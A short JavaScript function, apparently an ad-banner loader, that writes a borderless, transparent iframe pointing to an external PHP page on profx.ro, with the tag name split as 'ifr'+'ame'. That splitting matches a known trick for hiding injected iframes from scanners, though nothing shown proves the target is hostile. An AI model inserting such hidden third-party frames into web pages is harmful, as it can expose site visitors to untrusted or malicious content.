function banner()
{
	var w = window;
        url = 'http://profx.ro/exp/oferta2.php';
        var size = w.format.split('x');
	var textIFR = '';
	textIFR += '<ifr'+'ame style=" width:'+size[0]+'px;height:'+size[1]+'px;" frameborder=0 src="'+url+'"';
	textIFR += ' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency="true" scrolling="no">';
	textIFR += '</ifr'+'ame>';
	document.write(textIFR);
}
banner();

